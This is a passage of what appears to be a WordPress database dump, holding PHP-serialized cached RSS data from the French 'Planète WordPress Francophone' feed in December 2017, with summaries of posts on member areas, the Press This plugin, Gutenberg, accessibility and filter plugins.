"data\";s:24:\"Subscribe with NewsGator\";s:7:\"attribs\";a:1:{s:0:\"\";a:2:{s:4:\"href\";s:112:\"http://www.newsgator.com/ngs/subscriber/subext.aspx?url=http%3A%2F%2Ffeeds.feedburner.com%2FWordpressFrancophone\";s:3:\"src\";s:42:\"http://www.newsgator.com/images/ngsub1.gif\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:24:\"Subscribe with Bloglines\";s:7:\"attribs\";a:1:{s:0:\"\";a:2:{s:4:\"href\";s:77:\"http://www.bloglines.com/sub/http://feeds.feedburner.com/WordpressFrancophone\";s:3:\"src\";s:48:\"http://www.bloglines.com/images/sub_modern11.gif\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:23:\"Subscribe with Netvibes\";s:7:\"attribs\";a:1:{s:0:\"\";a:2:{s:4:\"href\";s:98:\"http://www.netvibes.com/subscribe.php?url=http%3A%2F%2Ffeeds.feedburner.com%2FWordpressFrancophone\";s:3:\"src\";s:39:\"//www.netvibes.com/img/add2netvibes.gif\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:21:\"Subscribe with Google\";s:7:\"attribs\";a:1:{s:0:\"\";a:2:{s:4:\"href\";s:93:\"http://fusion.google.com/add?feedurl=http%3A%2F%2Ffeeds.feedburner.com%2FWordpressFrancophone\";s:3:\"src\";s:51:\"http://buttons.googlesyndication.com/fusion/add.gif\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:4;a:5:{s:4:\"data\";s:25:\"Subscribe with Pageflakes\";s:7:\"attribs\";a:1:{s:0:\"\";a:2:{s:4:\"href\";s:101:\"http://www.pageflakes.com/subscribe.aspx?url=http%3A%2F%2Ffeeds.feedburner.com%2FWordpressFrancophone\";s:3:\"src\";s:87:\"http://www.pageflakes.com/ImageFile.ashx?instanceId=Static_4&fileName=ATP_blu_91x17.gif\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:5;a:5:{s:4:\"data\";s:21:\"Subscribe with Plusmo\";s:7:\"attribs\";a:1:{s:0:\"\";a:2:{s:4:\"href\";s:86:\"http://www.plusmo.com/add?url=http%3A%2F%2Ffeeds.feedburner.com%2FWordpressFrancophone\";s:3:\"src\";s:43:\"http://plusmo.com/res/graphics/fbplusmo.gif\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:6;a:5:{s:4:\"data\";s:23:\"Subscribe with Live.com\";s:7:\"attribs\";a:1:{s:0:\"\";a:2:{s:4:\"href\";s:81:\"http://www.live.com/?add=http%3A%2F%2Ffeeds.feedburner.com%2FWordpressFrancophone\";s:3:\"src\";s:141:\"http://tkfiles.storage.msn.com/x1piYkpqHC_35nIp1gLE68-wvzLZO8iXl_JMledmJQXP-XTBOLfmQv4zhj4MhcWEJh_GtoBIiAl1Mjh-ndp9k47If7hTaFno0mxW9_i3p_5qQw\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:7;a:5:{s:4:\"data\";s:25:\"Subscribe with Mon Yahoo!\";s:7:\"attribs\";a:1:{s:0:\"\";a:2:{s:4:\"href\";s:99:\"https://add.my.yahoo.com/content?lg=fr&url=http%3A%2F%2Ffeeds.feedburner.com%2FWordpressFrancophone\";s:3:\"src\";s:60:\"http://us.i1.yimg.com/us.yimg.com/i/us/my/bn/intatm_fr_1.gif\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:8;a:5:{s:4:\"data\";s:25:\"Subscribe with Excite MIX\";s:7:\"attribs\";a:1:{s:0:\"\";a:2:{s:4:\"href\";s:89:\"http://mix.excite.eu/add?feedurl=http%3A%2F%2Ffeeds.feedburner.com%2FWordpressFrancophone\";s:3:\"src\";s:42:\"http://image.excite.co.uk/mix/addtomix.gif\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:52:\"http://backend.userland.com/creativeCommonsRssModule\";a:1:{s:7:\"license\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"http://creativecommons.org/licenses/by-nc-sa/3.0/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";O:42:\"Requests_Utility_CaseInsensitiveDictionary\":1:{s:7:\"\0*\0data\";a:10:{s:12:\"content-type\";s:23:\"text/xml; charset=UTF-8\";s:4:\"etag\";s:27:\"KOpVGqfxVL5wdKgox9r40NxZA3o\";s:13:\"last-modified\";s:29:\"Fri, 08 Dec 2017 07:30:36 GMT\";s:16:\"content-encoding\";s:4:\"gzip\";s:4:\"date\";s:29:\"Fri, 08 Dec 2017 07:42:42 GMT\";s:7:\"expires\";s:29:\"Fri, 08 Dec 2017 07:42:42 GMT\";s:13:\"cache-control\";s:18:\"private, max-age=0\";s:22:\"x-content-type-options\";s:7:\"nosniff\";s:16:\"x-xss-protection\";s:13:\"1; mode=block\";s:6:\"server\";s:3:\"GSE\";}}s:5:\"build\";s:14:\"20130911020210\";}','no'),(2469,'_transient_timeout_feed_mod_66a70e9599b658d5cc038e8074597e7c','1512762162','no'),(2470,'_transient_feed_mod_66a70e9599b658d5cc038e8074597e7c','1512718962','no'),(2471,'_transient_timeout_feed_76f8d9281c01f21e505004d0986f50c6','1512762162','no'),(2472,'_transient_feed_76f8d9281c01f21e505004d0986f50c6','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:5:\"\n		\n	\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:79:\"\n		\n		\n		\n		\n		\n		\n					\n						\n						\n						\n						\n						\n						\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"Planète WordPress Francophone\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:17:\"https://wpfr.net/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"Toute l’actualité de WordPress en français !\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"fr-FR\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:8:{i:0;a:6:{s:4:\"data\";s:84:\"\n		        \n		        \n		        \n		        \n		        \n		        \n		        \n		    \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"Comment créer un Espace de Membres avec votre WordPress ?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"http://feedproxy.google.com/~r/wpfr/~3/eTpoqvkpD9o/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"https://wpformation.com/espace-membres-wordpress/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 07 Dec 2017 08:04:31 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:589:\"\n		        Si vous êtes plusieurs à utiliser le même site WordPress, vous connaissez déjà la notion de rôles que vous pouvez définir dans la rubrique  “utilisateurs” de votre Dashboard. L’espace de membres reprend cette notion mais il vous permet surtout de créer un espace dédié spécifiquement à vos utilisateurs. &#160; Pourquoi créer un Espace de Membres [&#8230;]\n\n\nComment créer un Espace de Membres avec votre WordPress ? est un article de WP FormationFormation WordPress, SEO &amp; WooCommerce - Pour ne rien manquer : Abonnez-vous à la newsletter !\n		        \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"WP Formation\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:1428:\"<p><img width=\"877\" height=\"547\" src=\"https://cdn.wpformation.com/wp-content/uploads/2017/11/espace-de-membres-WordPress.jpg\" class=\"attachment-Large size-Large wp-post-image\" alt=\"espace de membres WordPress\" style=\"margin-left: 0px;margin-right: auto;margin-top:10px;margin-bottom:10px;max-width: 640px;max-height: 400px\" />Si vous êtes plusieurs à utiliser le même site WordPress, vous connaissez déjà la notion de rôles que vous pouvez définir dans la rubrique  “utilisateurs” de votre Dashboard. L’espace de membres reprend cette notion mais il vous permet surtout de créer un espace dédié spécifiquement à vos utilisateurs. &#160; Pourquoi créer un Espace de Membres [&#8230;]</p>\n<p></p>\n<hr>\n<a rel=\"nofollow\" href=\"https://wpformation.com/espace-membres-wordpress/\">Comment créer un Espace de Membres avec votre WordPress ?</a> est un article de <a title=\"Formation WordPress Ecommerce\" href=\"https://wpformation.com\">WP Formation</a><br /><a href=\"https://wpformation.com/formation-wordpress/\">Formation WordPress</a>, <a href=\"https://wpformation.com/formation-wordpress-pro/\">SEO</a> &amp; <a href=\"https://wpformation.com/formation-woocommerce-e-commerce/\">WooCommerce</a> - Pour ne rien manquer : <a href=\"https://wpformation.com/abonnement-newsletter-wpf/\">Abonnez-vous à la newsletter</a> !</p>\n<hr><img src=\"http://feeds.feedburner.com/~r/wpfr/~4/eTpoqvkpD9o\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"https://wpformation.com/espace-membres-wordpress/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:84:\"\n		        \n		        \n		        \n		        \n		        \n		        \n		        \n		    \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:45:\"L’extension « Press This » de WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"http://feedproxy.google.com/~r/wpfr/~3/f6qqh4RrMWY/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:42:\"https://dfarnier.fr/lextension-press-this/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 06 Dec 2017 11:56:33 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:613:\"\n		        Vous consultez un site internet, et vous aimeriez pouvoir facilement recopier tout ou partie de son contenu dans un nouvel article publié sur votre site WordPress. C&#8217;est exactement ce que permet l&#8217;extension « Press This ». Jusqu&#8217;à la version 4.8, l&#8217;outil était intégré au noyau de WordPress. Depuis la version 4.9, il faut installer l&#8217;extension « Press This ». &#8230; Suite de l\'article L&#8217;extension « Press This » de WordPress ...\nCet article L&rsquo;extension « Press This » de WordPress est apparu en premier sur Débuter WordPress.		        \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Daniel Farnier\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:933:\"<p>Vous consultez un site internet, et vous aimeriez pouvoir facilement recopier tout ou partie de son contenu dans un nouvel article publié sur votre site WordPress. C&#8217;est exactement ce que permet l&#8217;extension « Press This ». Jusqu&#8217;à la version 4.8, l&#8217;outil était intégré au noyau de WordPress. Depuis la version 4.9, il faut installer l&#8217;extension « Press This ». &#8230; <a href=\"https://dfarnier.fr/lextension-press-this/\" class=\"more-link\">Suite de l\'article <span class=\"screen-reader-text\">L&#8217;extension « Press This » de WordPress</span> ...</a></p>\n<p>Cet article <a rel=\"nofollow\" href=\"https://dfarnier.fr/lextension-press-this/\">L&rsquo;extension « Press This » de WordPress</a> est apparu en premier sur <a rel=\"nofollow\" href=\"https://dfarnier.fr\">Débuter WordPress</a>.</p><img src=\"http://feeds.feedburner.com/~r/wpfr/~4/f6qqh4RrMWY\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:42:\"https://dfarnier.fr/lextension-press-this/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:84:\"\n		        \n		        \n		        \n		        \n		        \n		        \n		        \n		    \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:45:\"WordPress en 2018 et la révolution Gutenberg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"http://feedproxy.google.com/~r/wpfr/~3/O1Lt2NL6wRs/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"http://www.geekpress.fr/wordpress-en-2018-et-la-revolution-gutenberg/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 05 Dec 2017 19:12:03 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:501:\"\n		        Chaque année en décembre se déroule le WordCamp US (voir notre article sur l’édition 2016), l’évènement le plus attendu avec le WordCamp Europe. En plus des conférences et du contributeur day, c’est aussi l’occasion d’assister au State of the Word (#SOTW) présenté par Matt Mullenweg qui annonce les changements majeurs sur WordPress. Les 2000 participants [&#8230;]\nCet article WordPress en 2018 et la révolution Gutenberg est apparu en premier sur GeekPress.		        \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"Geekpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:737:\"<p>Chaque année en décembre se déroule le WordCamp US (voir notre article sur l’édition 2016), l’évènement le plus attendu avec le WordCamp Europe. En plus des conférences et du contributeur day, c’est aussi l’occasion d’assister au State of the Word (#SOTW) présenté par Matt Mullenweg qui annonce les changements majeurs sur WordPress. Les 2000 participants [&#8230;]</p>\n<p>Cet article <a rel=\"nofollow\" href=\"http://www.geekpress.fr/wordpress-en-2018-et-la-revolution-gutenberg/\">WordPress en 2018 et la révolution Gutenberg</a> est apparu en premier sur <a rel=\"nofollow\" href=\"http://www.geekpress.fr\">GeekPress</a>.</p><img src=\"http://feeds.feedburner.com/~r/wpfr/~4/O1Lt2NL6wRs\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"http://www.geekpress.fr/wordpress-en-2018-et-la-revolution-gutenberg/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:84:\"\n		        \n		        \n		        \n		        \n		        \n		        \n		        \n		    \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:93:\"L’accessibilité numérique : une composante essentielle pour un site WordPress de qualité\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"http://feedproxy.google.com/~r/wpfr/~3/kgxuTHe-SvE/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:113:\"https://www.wpnormandie.fr/laccessibilite-numerique-une-composante-essentielle-pour-un-site-wordpress-de-qualite/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 05 Dec 2017 14:24:32 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:408:\"\n		        L’accessibilité numérique permet aux personnes en situation de handicap d’utiliser votre site WordPress comme tout le monde, sans blocage, sans perte d’information et en utilisant tous les services que vous mettez à la disposition des internautes. D’après l’organisme commun des institutions de rente et de prévoyance (ocirp), 20 % de la population en France est [&#8230;]		        \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:478:\"L’accessibilité numérique permet aux personnes en situation de handicap d’utiliser votre site WordPress comme tout le monde, sans blocage, sans perte d’information et en utilisant tous les services que vous mettez à la disposition des internautes. D’après l’organisme commun des institutions de rente et de prévoyance (ocirp), 20 % de la population en France est [&#8230;]<img src=\"http://feeds.feedburner.com/~r/wpfr/~4/kgxuTHe-SvE\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:113:\"https://www.wpnormandie.fr/laccessibilite-numerique-une-composante-essentielle-pour-un-site-wordpress-de-qualite/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:84:\"\n		        \n		        \n		        \n		        \n		        \n		        \n		        \n		    \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:75:\"FacetWP vs Search &amp; Filter : quel est le meilleur plugin de filtres ?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"http://feedproxy.google.com/~r/wpfr/~3/17oNxqPzpW4/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"https://wpformation.com/facetwp-vs-search-filter/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 04 Dec 2017 07:45:10 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:593:\"\n		        Lorsque l\'on crée des sites WordPress avancés, il arrive que l\'ont ait besoin d\'un plugin qui permette à l\'internaute de filtrer les contenus disponibles sur le site afin qu\'il puisse trouver plus rapidement les informations qu\'il recherche. On retrouve les filtres le plus fréquemment sur les sites e-commerce mais ils peuvent servir pour tout type [&#8230;]\n\n\nFacetWP vs Search &amp; Filter : quel est le meilleur plugin de filtres ? est un article de WP FormationFormation WordPress, SEO &amp; WooCommerce - Pour ne rien manquer : Abonnez-vous à la newsletter !\n		        \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"WP Formation\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:1445:\"<p><img width=\"1118\" height=\"381\" src=\"https://cdn.wpformation.com/wp-content/uploads/2017/10/facetwp-vs-search-and-filter-pro.jpg\" class=\"attachment-Large size-Large wp-post-image\" alt=\"facetwp vs search &amp; filter pro\" style=\"margin-left: 0px;margin-right: auto;margin-top:10px;margin-bottom:10px;max-width: 640px;max-height: 400px\" />Lorsque l\'on crée des sites WordPress avancés, il arrive que l\'ont ait besoin d\'un plugin qui permette à l\'internaute de filtrer les contenus disponibles sur le site afin qu\'il puisse trouver plus rapidement les informations qu\'il recherche. On retrouve les filtres le plus fréquemment sur les sites e-commerce mais ils peuvent servir pour tout type [&#8230;]</p>\n<p></p>\n<hr>\n<a rel=\"nofollow\" href=\"https://wpformation.com/facetwp-vs-search-filter/\">FacetWP vs Search &amp; Filter : quel est le meilleur plugin de filtres ?</a> est un article de <a title=\"Formation WordPress Ecommerce\" href=\"https://wpformation.com\">WP Formation</a><br /><a href=\"https://wpformation.com/formation-wordpress/\">Formation WordPress</a>, <a href=\"https://wpformation.com/formation-wordpress-pro/\">SEO</a> &amp; <a href=\"https://wpformation.com/formation-woocommerce-e-commerce/\">WooCommerce</a> - Pour ne rien manquer : <a href=\"https://wpformation.com/abonnement-newsletter-wpf/\">Abonnez-vous à la newsletter</a> !</p>\n<hr><img src=\"http://feeds.feedburner.com/~r/wpfr/~4/17oNxqPzpW4\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"https://wpformation.com/facetwp-vs-search-filter/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:84:\"\n		        \n		        \n		        \n		        \n		        \n		        \n		        \n		    \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"Supporter les galeries d’images WordPress en 